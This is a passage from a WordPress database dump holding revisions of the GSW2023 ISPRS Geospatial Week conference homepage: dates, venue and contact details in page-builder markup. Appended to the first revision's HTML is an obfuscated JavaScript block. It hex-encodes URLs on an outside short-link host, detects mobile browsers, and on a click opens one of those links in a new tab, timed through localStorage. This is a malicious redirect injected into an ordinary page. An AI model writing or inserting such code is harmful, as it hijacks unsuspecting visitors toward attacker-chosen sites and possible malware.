10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675475978120{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 02:06:53','2023-02-04 02:06:53','',3066,'https://gsw2023.com/?p=3736',0,'revision','',0),
(3737,1,'2023-02-04 02:11:58','2023-02-04 02:11:58','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening  Registration : soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675475978120{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 